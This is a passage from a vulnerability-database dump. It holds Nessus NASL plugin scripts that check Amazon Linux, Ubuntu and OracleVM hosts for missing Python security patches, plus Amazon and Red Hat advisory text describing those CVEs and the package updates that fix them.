os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"python27-2.7.8-6.74.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-debuginfo-2.7.8-6.74.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-devel-2.7.8-6.74.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-libs-2.7.8-6.74.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-test-2.7.8-6.74.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-tools-2.7.8-6.74.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python27 / python27-debuginfo / python27-devel / python27-libs / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-23T18:55:20", "description": "It was discovered that multiple Python protocol libraries incorrectly\nlimited certain data when connecting to servers. A malicious ftp,\nhttp, imap, nntp, pop or smtp server could use this issue to cause a\ndenial of service. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit\nunpacking gzip-compressed HTTP bodies. A malicious server could use\nthis issue to cause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a\ncertain argument. An attacker could possibly use this issue to read\narbitrary memory and expose sensitive information. This issue only\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled\nURL-encoded path separators in URLs. A remote attacker could use this\nissue to expose sensitive information, or possibly execute arbitrary\ncode. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.\n(CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in\nbuffer functions. An attacker could possibly use this issue to read\narbitrary memory and obtain sensitive information. This issue only\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-06-26T00:00:00", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : python2.7, python3.2, python3.4 vulnerabilities (USN-2653-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "modified": "2015-06-26T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:python3.4-minimal", "p-cpe:/a:canonical:ubuntu_linux:python3.4", "p-cpe:/a:canonical:ubuntu_linux:python2.7", "cpe:/o:canonical:ubuntu_linux:14.10", "p-cpe:/a:canonical:ubuntu_linux:python3.2", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:python2.7-minimal", "p-cpe:/a:canonical:ubuntu_linux:python3.2-minimal", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2653-1.NASL", "href": "https://www.tenable.com/plugins/nessus/84428", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2653-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84428);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/22\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_bugtraq_id(63804, 66958, 68119, 68147, 70089);\n script_xref(name:\"USN\", value:\"2653-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : python2.7, python3.2, python3.4 vulnerabilities (USN-2653-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that multiple Python protocol libraries incorrectly\nlimited certain data when connecting to servers. A malicious ftp,\nhttp, imap, nntp, pop or smtp server could use this issue to cause a\ndenial of service. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit\nunpacking gzip-compressed HTTP bodies. A malicious server could use\nthis issue to cause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a\ncertain argument. An attacker could possibly use this issue to read\narbitrary memory and expose sensitive information. This issue only\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled\nURL-encoded path separators in URLs. A remote attacker could use this\nissue to expose sensitive information, or possibly execute arbitrary\ncode. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.\n(CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in\nbuffer functions. An attacker could possibly use this issue to read\narbitrary memory and obtain sensitive information. This issue only\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2653-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python2.7-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.2-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.4-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python2.7\", pkgver:\"2.7.3-0ubuntu3.8\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python2.7-minimal\", pkgver:\"2.7.3-0ubuntu3.8\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python3.2\", pkgver:\"3.2.3-0ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python3.2-minimal\", pkgver:\"3.2.3-0ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python2.7\", pkgver:\"2.7.6-8ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python2.7-minimal\", pkgver:\"2.7.6-8ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python3.4\", pkgver:\"3.4.0-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python3.4-minimal\", pkgver:\"3.4.0-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python2.7\", pkgver:\"2.7.8-10ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python2.7-minimal\", pkgver:\"2.7.8-10ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python3.4\", pkgver:\"3.4.2-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python3.4-minimal\", pkgver:\"3.4.2-1ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python2.7 / python2.7-minimal / python3.2 / python3.2-minimal / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-01T00:41:25", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Add Oracle Linux distribution in platform.py [orabug\n 21288328] (Keshav Sharma)\n\n - Enable use of deepcopy with instance methods Resolves:\n rhbz#1223037\n\n - Since -libs now provide python-ordered dict, added\n ordereddict dist-info to site-packages Resolves:\n rhbz#1199997\n\n - Fix CVE-2014-7185/4650/1912 (CVE-2013-1752) Resolves:\n rhbz#1206572\n\n - Fix logging module error when multiprocessing module is\n not initialized Resolves: rhbz#1204966\n\n - Add provides for python-ordereddict Resolves:\n rhbz#1199997\n\n - Let ConfigParse handle options without values\n\n - Add check phase to specfile, fix and skip relevant\n failing tests Resolves: rhbz#1031709\n\n - Make Popen.communicate catch EINTR error Resolves:\n rhbz#1073165\n\n - Add choices for sort option of cProfile for better\n output Resolves: rhbz#1160640\n\n - Make multiprocessing ignore EINTR Resolves: rhbz#1180864\n\n - Fix iteration over files with very long lines Resolves:\n rhbz#794632\n\n - Fix subprocess.Popen.communicate being broken by SIGCHLD\n handler. Resolves: rhbz#1065537\n\n - Rebuild against latest valgrind-devel. Resolves:\n rhbz#1142170\n\n - Bump release up to ensure proper upgrade path. Related:\n rhbz#958256\n\n - Fix multilib dependencies. Resolves: rhbz#958256", "edition": 23, "published": "2015-07-31T00:00:00", "title": "OracleVM 3.3 : python (OVMSA-2015-0098)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7185", "CVE-2013-1752"], "modified": "2020-11-02T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:python-libs", "cpe:/o:oracle:vm_server:3.3", "p-cpe:/a:oracle:vm:python"], "id": "ORACLEVM_OVMSA-2015-0098.NASL", "href": "https://www.tenable.com/plugins/nessus/85139", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2015-0098.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85139);\n script_version(\"2.4\");\n script_cvs_date(\"Date: 2019/09/27 13:00:34\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2014-7185\");\n script_bugtraq_id(63804, 70089);\n\n script_name(english:\"OracleVM 3.3 : python (OVMSA-2015-0098)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Add Oracle Linux distribution in platform.py [orabug\n 21288328] (Keshav Sharma)\n\n - Enable use of deepcopy with instance methods Resolves:\n rhbz#1223037\n\n - Since -libs now provide python-ordered dict, added\n ordereddict dist-info to site-packages Resolves:\n rhbz#1199997\n\n - Fix CVE-2014-7185/4650/1912 (CVE-2013-1752) Resolves:\n rhbz#1206572\n\n - Fix logging module error when multiprocessing module is\n not initialized Resolves: rhbz#1204966\n\n - Add provides for python-ordereddict Resolves:\n rhbz#1199997\n\n - Let ConfigParse handle options without values\n\n - Add check phase to specfile, fix and skip relevant\n failing tests Resolves: rhbz#1031709\n\n - Make Popen.communicate catch EINTR error Resolves:\n rhbz#1073165\n\n - Add choices for sort option of cProfile for better\n output Resolves: rhbz#1160640\n\n - Make multiprocessing ignore EINTR Resolves: rhbz#1180864\n\n - Fix iteration over files with very long lines Resolves:\n rhbz#794632\n\n - Fix subprocess.Popen.communicate being broken by SIGCHLD\n handler. Resolves: rhbz#1065537\n\n - Rebuild against latest valgrind-devel. Resolves:\n rhbz#1142170\n\n - Bump release up to ensure proper upgrade path. Related:\n rhbz#958256\n\n - Fix multilib dependencies. Resolves: rhbz#958256\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2015-July/000346.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python / python-libs packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"python-2.6.6-64.0.1.el6\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"python-libs-2.6.6-64.0.1.el6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-libs\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:37:01", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7185", "CVE-2013-1752", "CVE-2014-4650"], "description": "**Issue Overview:**\n\nAn integer overflow flaw was found in the way the buffer() function handled its offset and size arguments. An attacker able to control those arguments could use this flaw to disclose portions of the application memory or cause it to crash.\n\nIt was discovered that multiple Python standard library modules implementing network protocols (such as httplib or smtplib) failed to restrict sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of memory.\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL encoded paths. A remote attacker could use this flaw to execute scripts outside of the cgi-bin directory, or disclose source of scripts in the cgi-bin directory.\n\n \n**Affected Packages:** \n\n\npython26\n\n \n**Issue Correction:** \nRun _yum update python26_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n python26-test-2.6.9-2.83.amzn1.i686 \n python26-tools-2.6.9-2.83.amzn1.i686 \n python26-debuginfo-2.6.9-2.83.amzn1.i686 \n python26-libs-2.6.9-2.83.amzn1.i686 \n python26-devel-2.6.9-2.83.amzn1.i686 \n python26-2.6.9-2.83.amzn1.i686 \n \n src: \n python26-2.6.9-2.83.amzn1.src \n \n x86_64: \n python26-devel-2.6.9-2.83.amzn1.x86_64 \n python26-libs-2.6.9-2.83.amzn1.x86_64 \n python26-tools-2.6.9-2.83.amzn1.x86_64 \n python26-2.6.9-2.83.amzn1.x86_64 \n python26-test-2.6.9-2.83.amzn1.x86_64 \n python26-debuginfo-2.6.9-2.83.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2015-12-14T10:00:00", "published": "2015-12-14T10:00:00", "id": "ALAS-2015-621", "href": "https://alas.aws.amazon.com/ALAS-2015-621.html", "title": "Medium: python26", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-10T12:37:14", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7185", "CVE-2014-4650"], "description": "**Issue Overview:**\n\nIt was [discovered](<http://bugs.python.org/issue21766>) that Python built-in module CGIHTTPServer does not properly handle URL-encoded path separators in URLs which may enable attackers to disclose a CGI script's source code or execute arbitrary scripts in the server's document root. ([CVE-2014-4650 __](<https://access.redhat.com/security/cve/CVE-2014-4650>))\n\nInteger overflow in bufferobject.c in Python before 2.7.8 allows context-dependent attackers to obtain sensitive information from process memory via a large size and offset in a \"buffer\" function. ([CVE-2014-7185 __](<https://access.redhat.com/security/cve/CVE-2014-7185>))\n\n \n**Affected Packages:** \n\n\npython27\n\n \n**Issue Correction:** \nRun _yum update python27_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n python27-tools-2.7.8-6.74.amzn1.i686 \n python27-debuginfo-2.7.8-6.74.amzn1.i686 \n python27-devel-2.7.8-6.74.amzn1.i686 \n python27-test-2.7.8-6.74.amzn1.i686 \n python27-libs-2.7.8-6.74.amzn1.i686 \n python27-2.7.8-6.74.amzn1.i686 \n \n src: \n python27-2.7.8-6.74.amzn1.src \n \n x86_64: \n python27-debuginfo-2.7.8-6.74.amzn1.x86_64 \n python27-devel-2.7.8-6.74.amzn1.x86_64 \n python27-test-2.7.8-6.74.amzn1.x86_64 \n python27-2.7.8-6.74.amzn1.x86_64 \n python27-libs-2.7.8-6.74.amzn1.x86_64 \n python27-tools-2.7.8-6.74.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2014-11-05T12:15:00", "published": "2014-11-05T12:15:00", "id": "ALAS-2014-440", "href": "https://alas.aws.amazon.com/ALAS-2014-440.html", "title": "Medium: python27", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-10T12:35:27", "bulletinFamily": "unix", "cvelist": ["CVE-2014-1912"], "description": "**Issue Overview:**\n\nBuffer overflow in the socket.recvfrom_into function in Modules/socketmodule.c in Python 2.5 before 2.7.7, 3.x before 3.3.4, and 3.4.x before 3.4rc1 allows remote attackers to execute arbitrary code via a crafted string. \n\n \n**Affected Packages:** \n\n\npython26\n\n \n**Issue Correction:** \nRun _yum update python26_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n python26-devel-2.6.9-1.43.amzn1.i686 \n python26-libs-2.6.9-1.43.amzn1.i686 \n python26-debuginfo-2.6.9-1.43.amzn1.i686 \n python26-2.6.9-1.43.amzn1.i686 \n python26-test-2.6.9-1.43.amzn1.i686 \n python26-tools-2.6.9-1.43.amzn1.i686 \n \n src: \n python26-2.6.9-1.43.amzn1.src \n \n x86_64: \n python26-devel-2.6.9-1.43.amzn1.x86_64 \n python26-2.6.9-1.43.amzn1.x86_64 \n python26-test-2.6.9-1.43.amzn1.x86_64 \n python26-debuginfo-2.6.9-1.43.amzn1.x86_64 \n python26-tools-2.6.9-1.43.amzn1.x86_64 \n python26-libs-2.6.9-1.43.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-02-26T14:28:00", "published": "2014-02-26T14:28:00", "id": "ALAS-2014-292", "href": "https://alas.aws.amazon.com/ALAS-2014-292.html", "title": "Medium: python26", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-10T12:36:17", "bulletinFamily": "unix", "cvelist": ["CVE-2014-1912"], "description": "**Issue Overview:**\n\nBuffer overflow in the socket.recvfrom_into function in Modules/socketmodule.c in Python 2.5 before 2.7.7, 3.x before 3.3.4, and 3.4.x before 3.4rc1 allows remote attackers to execute arbitrary code via a crafted string. \n\n \n**Affected Packages:** \n\n\npython27\n\n \n**Issue Correction:** \nRun _yum update python27_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n python27-tools-2.7.5-11.32.amzn1.i686 \n python27-test-2.7.5-11.32.amzn1.i686 \n python27-2.7.5-11.32.amzn1.i686 \n python27-debuginfo-2.7.5-11.32.amzn1.i686 \n python27-libs-2.7.5-11.32.amzn1.i686 \n python27-devel-2.7.5-11.32.amzn1.i686 \n \n src: \n python27-2.7.5-11.32.amzn1.src \n \n x86_64: \n python27-tools-2.7.5-11.32.amzn1.x86_64 \n python27-libs-2.7.5-11.32.amzn1.x86_64 \n python27-devel-2.7.5-11.32.amzn1.x86_64 \n python27-2.7.5-11.32.amzn1.x86_64 \n python27-debuginfo-2.7.5-11.32.amzn1.x86_64 \n python27-test-2.7.5-11.32.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-02-26T14:28:00", "published": "2014-02-26T14:28:00", "id": "ALAS-2014-293", "href": "https://alas.aws.amazon.com/ALAS-2014-293.html", "title": "Medium: python27", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-1912", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185"], "description": "Python is an interpreted, interactive, object-oriented programming language\nthat supports modules, classes, exceptions, high-level dynamic data types,\nand dynamic typing. The python27 collection provide a stable release of\nPython 2.7 with a number of additional utilities and database connectors\nfor MySQL and PostgreSQL.\n\nThe python27-python packages have been upgraded to upstream version 2.7.8,\nwhich provides numerous bug fixes over the previous version. (BZ#1167912)\n\nThe following security issues were fixed in the python27-python component:\n\nIt was discovered that the socket.recvfrom_into() function failed to check\nthe size of the supplied buffer. This could lead to a buffer overflow when\nthe function was called with an insufficiently sized buffer.\n(CVE-2014-1912)\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nThe following security issue was fixed in the python27-python and\npython27-python-simplejson components:\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nIn addition, this update adds the following enhancement:\n\n* The python27 Software Collection now includes the python-wheel and\npython-pip modules. (BZ#994189, BZ#1167902)\n\nAll python27 users are advised to upgrade to these updated packages, which\ncorrect these issues and add these enhancements. All running python27\ninstances must be restarted for this update to take effect.\n", "modified": "2018-06-13T01:28:19", "published": "2015-06-04T04:00:00", "id": "RHSA-2015:1064", "href": "https://access.redhat.com/errata/RHSA-2015:1064", "type": "redhat", "title": "(RHSA-2015:1064) Moderate: python27 security, bug fix, and enhancement update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T11:34:32", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185", "CVE-2014-9365"], "description": "Python is an interpreted, interactive, object-oriented programming language\noften compared to Tcl, Perl, Scheme, or Java. Python includes modules,\nclasses, exceptions, very high level dynamic data types and dynamic typing.\nPython supports interfaces to many system calls and libraries, as well as\nto various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib)\ndid not perform verification of TLS/SSL certificates when connecting to\nHTTPS servers. A 